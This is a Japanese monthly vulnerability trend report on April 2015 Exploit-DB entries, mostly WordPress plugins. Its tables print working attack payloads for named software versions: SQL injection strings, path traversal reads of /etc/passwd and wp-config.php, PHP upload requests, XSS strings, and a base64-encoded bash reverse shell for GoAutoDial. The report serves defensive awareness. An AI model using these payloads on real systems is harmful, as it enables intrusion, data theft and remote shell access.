1. 脆弱性別件数 脆弱性カテゴリ 件数 コマンドインジェクション (Command Injection) 1 ファイルアップロード (File Upload) 3 クロス サイト スクリプティング
(Cross Site Scripting:XSS) 4
ローカルファイル挿入
(Local File Inclusion:LFI) 6 SQL インジェクション (SQL Injection) 19 合計 33 2. 危険度別件数 危険度 件数 割合 早急対応要 16 48% 高 17 52% 中 0 0% 合計 33 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 6 18% 中 9 27% 易 18 55% 合計 33 100% 4. 主なソフトウェア別脆弱性発生件数 件数 21 2 2 1 1 1 1 1 1 1 1 33 2015年4月は、Exploit-DBの分析結果をみると、SQLインジェクション攻撃による脆弱性が最も多く報告されました。そのSQLインジェクション攻撃のほとんどは、Wordpress CMSから発見されました。Wordpress CMSは、SQLインジェクション攻撃だけではなく、クロス・サイト・スクリプティング(Cross Site Scripting;XSS)攻撃や、ファイルアップロード(File Upload)といった様々な脆弱性が多数発見され、今月に脆弱性が最 も多く報告されたソフトウェアとなっています。Wordpressにおける脆弱性のほとんどがPluginにて発生しているため、Wordpressのご利用の管理者は、脆弱性の診断やPluginのアップデートを定期的に行い、セキュ リティを維持しなければなりません。また、GoAutoDialのソフトウェアからも2件の脆弱性が発見されました。当該の脆弱性は、ソースコードによるものであり、単純な攻撃パターンだけでも悪用可能です。難易度は易し いレベルであっても、莫大な被害を及ぼす可能性があるため、特別な注意が必要です。 Wordpress 2015.04.01~2015.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 サマリー ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム ソフトウェア名 合計 Joomla GoAutoDial Ericsson phpSFP u-Auctions ZENworks Shareaholic BlueDragon CFChart Servlet
Balero Wolf 1 3 4 6 19 0 2 4 6 8 10 12 14 16 18 20
脆弱性別件数
16 17 0危険度別分類
早急対応要 高 中 6 9 18攻撃実行の難易度別件数
難 中 易 21 2 2 1 1 1 1 1 1 1 1 0 5 10 15 20 25主なソフトウェア別脆弱性発生件数
Wordpress Joomla GoAutoDial Ericsson phpSFP u-Auctions ZENworks Balero Shareaholic BlueDragon CFChart Servlet Wolf2015.04.01~2015.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 中:情報漏洩 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名
36614 File Upload 易 早急対応要 WordPress Simple Ads Manager 2.5.94 - sam-ajax-admin.php
File Upload 脆弱性 Wordpress
36613 SQL Injection 易 高 WordPress Simple Ads Manager Plugin - sam-ajax.php SQL
Injection 脆弱性 Wordpress
36613 SQL Injection 易 高 WordPress Simple Ads Manager Plugin - /sam-ajax-admin.php
SQL Injection 脆弱性 Wordpress
36600 SQL Injection 難 早急対応要 WordPress Business Intelligence Plugin - view.php SQL Injection
脆弱性 Wordpress
36677 SQL Injection 中 早急対応要 WordPress Traffic Analyzer Plugin 3.4.2 - / SQL Injection 脆弱性 Wordpress 36671 SQL Injection 中 早急対応要 WordPress All In One WP Security & Firewall 3.9.0 - admin.php
SQL Injection 脆弱性 Wordpress
36691 File Upload 易 早急対応要 WordPress Windows Desktop and iPhone Photo Uploader Plugin
-upload.php File Upload 脆弱性 Wordpress 36735 SQL Injection 中 早急対応要 WordPress Duplicator <= 0.5.14 - admin-ajax.php SQL Injection
脆弱性 Wordpress
36733 LFI 易 高 WordPress Plugin 'WP Mobile Edition' 2.7 - css.php LFI 脆弱性 Wordpress 36762 XSS 易 高 WordPress MiwoFTP Plugin 1.0.5 - admin.php XSS 脆弱性 Wordpress 36751 SQL Injection 易 高 WordPress Video Gallery 2.8 - admin-ajax.php SQL Injection 脆弱
性 Wordpress
36761 LFI 易 高 WordPress MiwoFTP Plugin 1.0.5 - admin.php LFI 脆弱性 Wordpress 36777 SQL Injection 中 高 WordPress Ajax Store Locator 1.2 - admin-ajax.php SQL Injection
脆弱性 Wordpress
36805 SQL Injection 易 高 WordPress Community Events Plugin 1.3.5 - / SQL Injection 脆弱
性 Wordpress
36802 SQL Injection 難 早急対応要 WordPress Tune Library Plugin 1.5.4 - / SQL Injection 脆弱性 Wordpress 36800 SQL Injection 中 早急対応要 WordPress NEX-Forms < 3.0 - admin-ajax.php SQL Injection 脆弱
性 Wordpress
36824 SQL Injection 易 高 Ultimate Product Catalogue WordPress Plugin - / SQL Injection 脆
弱性 Wordpress
36823 SQL Injection 易 高 Ultimate Product Catalogue WordPress Plugin - admin-ajax.phpSQL Injection 脆弱性 Wordpress 36860 LFI 易 早急対応要 WordPress TheCartPress Plugin 1.3.9 - admin.php LFI 脆弱性 Wordpress 36860 XSS 易 高 WordPress TheCartPress Plugin 1.3.9 - /shopping-cart/checkout/
XSS 脆弱性 Wordpress
36860 XSS 易 高 WordPress TheCartPress Plugin 1.3.9 - admin.php XSS 脆弱性 Wordpress
危険度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 攻撃実行難易度分類基準 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2015-04-02 36619 LFI 中 早急対応要 Ericsson Drutt MSDP (InstanceMonitor) - / LFI 脆弱性 /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd Ericsson
Ericsson Drutt MSDP (Instance Monitor) 2015-04-02 36616 SQL Injection 難 早急対応要 phpSFP Schedule Facebook Posts 1.5.6 - /index.php/login SQL Injection 脆弱性 GET /index.php/login HTTP/1.1 Host: Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select
concat_ws(0x3a,username,password) from users limit 1))) or '1|||2 phpSFP phpSFP -Schedule Facebook Posts 1.5.6 2015-04-02 36614 File Upload 易 早急対応要
WordPress Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload 脆弱性 POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: Connection: Close
Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream <? phpinfo(); ?> ---7dd10029908f2--Wordpress Wordpress plugin Simple Ads Manager 2.5.94 2015-04-02 36613 SQL Injection 易 高
WordPress Simple Ads Manager Plugin - sam-ajax.php SQL Injection 脆弱性
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=sam_hits&hits%5B0%5D%5B%5D=1 and 1=1&hits%5B1%5D%5B%5D=1 and
1=1&hits%5B2%5D%5B%5D=1 and 1=1&level=3
Wordpress Wordpress plugin Simple Ads Manager 2.5.94 and 2.5.96 2015-04-02 36613 SQL Injection 易 高
WordPress Simple Ads Manager Plugin - /sam-ajax-admin.php SQL Injection 脆弱性
POST/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=load_posts&cstr=1 and 1=1&sp=Post&spg=Page
Wordpress Wordpress plugin Simple Ads Manager 2.5.94 and 2.5.96 2015-04-02 36601 SQL Injection 難 早急対応要
Joomla Spider Random Article Componen - index.php SQL Injection 脆弱性 /index.php?option=com_rand&catID=1%27%20and(sele ct%201%20FROM(select%20count(*),concat((select%2 0(select%20concat(database(),0x27,0x7e))%20FROM% 20information_schema.tables%20LIMIT%200,1),floor(ra nd(0)*2))x%20FROM%20information_schema.tables%2 0GROUP%20BY%20x)a)--%20-&limit=1&style=1&view=articles&format=raw&Itemid=13 Joomla Joomla Spider Random Article Component 2015-04-02 36600 SQL Injection 難 早急対応要
WordPress Business Intelligence Plugin - view.php SQL Injection 脆弱性 /wp-content/plugins/wp-business-intelligence/view.php ?t=1337+union+select+1,2,3,group_concat(table_name), 5,6,7,8,9,10,11+from+information_schema.tables+where +table_schema=database()--%20 WordPress WordPress Business Intelligence Plugin 2015-04-05 36641 SQL Injection 難 早急対応要 u-Auctions - adsearch.php SQLInjection 脆弱性 /adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=1%20and%201=1 u-Auctions u-Auctions
2015-04-08 36678 LFI 易 早急対応要 ZENworks Configuration Management 11.3.1 -/zenworks/UploadServlet LFI 脆 弱性 POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks /share/tomcat/webapps/&filename=payload.war HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ZENworks ZENworks Configuration Management 11.3.1 2015-04-08 36677 SQL Injection 中 早急対応要
WordPress Traffic Analyzer Plugin 3.4.2 - / SQL Injection 脆 弱性
GET / HTTP/1.1 Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||' WordPress WordPress Traffic Analyzer Plugin 3.4.2 2015-04-08 36675 SQL Injection 中 高 Balero CMS 0.7.2 -/balerocms/admin/edit_page/m od-virtual_page/id-11SQL Injection 脆弱性 POST /balerocms/admin/edit_page/mod-virtual_page/id-11 HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=11' and benchmark
(50000000,sha1(1))--Balero Balero CMS 0.7.2
2015-04-08 36674 XSS 中 高 Shareaholic 7.6.0.3 - admin-ajax.php XSS 脆弱性
POST/wordpress-install/wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Shareaholic Shareaholic7.6.0.3 2015.04.01~2015.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2015.04.01~2015.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2015-04-09 36691 File Upload 易 早急対応要
WordPress Windows Desktop and iPhone Photo Uploader Plugin - upload.php File Upload 脆弱性
POST /wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php HTTP/1.1 Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2 Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream <? phpinfo(); ?> ---7dd10029908f2--WordPress WordPress Windows Desktop and iPhone Photo Uploader Plugin 2015-04-13 36735 SQL Injection 中 早急対応要 WordPress Duplicator <= 0.5.14 - admin-ajax.php SQL Injection 脆弱性 POST /wp-admin/admin-ajax.php?action=duplicator_package_delete HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
duplicator_delid=1 and (select * from (select(sleep(20)))a)
WordPress
WordPress Duplicator <=
0.5.14
2015-04-13 36733 LFI 易 高 WordPress Plugin 'WP Mobile Edition' 2.7 - css.php LFI 脆弱性 /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php WordPress WordPress Plugin 'WP Mobile Edition' 2.7 2015-04-14 36762 XSS 易 高 WordPress MiwoFTP Plugin
1.0.5 - admin.php XSS 脆弱性 /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes WordPress WordPress MiwoFTP Plugin 1.0.5 2015-04-14 36751 SQL Injection 易 高
WordPress Video Gallery 2.8 -admin-ajax.php SQL Injection 脆 弱性
/wp-admin/admin- ajax.php?action=googleadsense&vid=1%20and%201=1
-WordPress WordPress VideoGallery 2.8
2015-04-14 36761 LFI 易 高 WordPress MiwoFTP Plugin1.0.5 - admin.php LFI 脆弱性
POST
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 do_action=delete&first=y&selitems[]=../../../../../pls_mr_ja iler_dont_deleteme.txt WordPress WordPress MiwoFTP Plugin 1.0.5 2015-04-16 36777 SQL Injection 中 高
WordPress Ajax Store Locator 1.2 - admin-ajax.php SQL Injection 脆弱性
/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=Sear chStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
WordPress Store Locator 1.2WordPress Ajax
2015-04-21 36815 LFI 易 高
BlueDragon CFChart Servlet 7.1.1.17759 - /cfchart.cfchart LFI 脆弱性 /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp BlueDragon CFChart Servlet BlueDragon CFChart Servlet 7.1.1.17759 2015-04-21 36805 SQL Injection 易 高
WordPress Community Events Plugin 1.3.5 - / SQL Injection 脆 弱性 /?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1 WordPress WordPress Community Events Plugin 1.3.5 2015-04-21 36802 SQL Injection 難 早急対応要 WordPress Tune Library Plugin1.5.4 - / SQL Injection 脆弱性
/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),databas e()),2--%20 WordPress WordPress Tune Library Plugin 1.5.4 2015-04-21 36800 SQL Injection 中 早急対応要 WordPress NEXForms < 3.0 -admin-ajax.php SQL Injection 脆 弱性 /wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
WordPress WordPress NEX-Forms < 3.0 2015-04-21 36807 SQL Injection 易 高 GoAutoDial 3.31406088000 -/go_login/validate_credentials/a dmin/ SQL Injection 脆弱性 /go_login/validate_credentials/admin/%27%20OR%20% 271%27%3D%271 GoAutoDial GoAutoDial 3.3-1406088000 2015-04-21 36807 Command Injection 難 早急対応要 GoAutoDial 3.31406088000 -/index.php/go_site/cpanel/ Command Injection 脆弱性
/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvN DQ0NCAwPiYx | base64 --decode\`"
GoAutoDial GoAutoDial 3.3-1406088000
2015-04-22 36818 File Upload 易 高
Wolf CMS 0.8.2 -/admin/login/login File Upload 脆弱性
POST /admin/login/login HTTP/1.1 Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2
Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <? phpinfo(); ?> ---7dd10029908f2--Wolf Wolf CMS 0.8.2 2015-04-23 36824 SQL Injection 易 高
Ultimate Product Catalogue WordPress Plugin - / SQL Injection 脆弱性 /?SingleProduct=2'+and+'a'='a WordPress Ultimate Product Catalogue WordPress Plugin
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2015.04.01~2015.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2015-04-23 36823 SQL Injection 易 高
Ultimate Product Catalogue WordPress Plugin - admin-ajax.php SQL Injection 脆弱性
POST /wp-admin/admin-ajax.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Item_ID=2 AND SLEEP(5)&action=record_view
WordPress
Ultimate Product Catalogue WordPress Plugin
2015-04-29 36862 SQL Injection 中 早急対応要 OS Solution OSProperty 2.8.0 -index.php SQL Injection 脆弱性
/index.php?option=com_osproperty&no_html=1&tmpl=c omponent&task=ajax_loadStateInListPage&country_id=3 1' UNION ALL SELECT
NULL,CONCAT(0x716a627171,0x797774584a4b495471 4d,0x7162717071)# Joomla Joomla OS Solution OSProperty 2.8.0
2015-04-29 36860 LFI 易 早急対応要 WordPress TheCartPress Plugin1.3.9 - admin.php LFI 脆弱性
POST
/wp-admin/admin.php?page=checkout_editor_settings HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 tcp_save_fields=1&tcp_box_path=../../../../../etc/passwd WordPress WordPress TheCartPress Plugin 1.3.9 2015-04-29 36860 XSS 易 高
WordPress TheCartPress Plugin 1.3.9 - /shopping-cart/checkout/ XSS 脆弱性
POST /shopping-cart/checkout/ HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 selected_billing_id=1&selected_billing_address=new&billi ng_firstname="><script>alert(/immuniweb/);</script> WordPress WordPress TheCartPress Plugin 1.3.9
2015-04-29 36860 XSS 易 高 WordPress TheCartPress Plugin 1.3.9 - admin.php XSS 脆弱性 /wp-admin/admin.php?page=thecartpress/admin/AddressesLis t.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immu niweb%27%29;%3C/script%3E WordPress WordPress TheCartPress Plugin 1.3.9
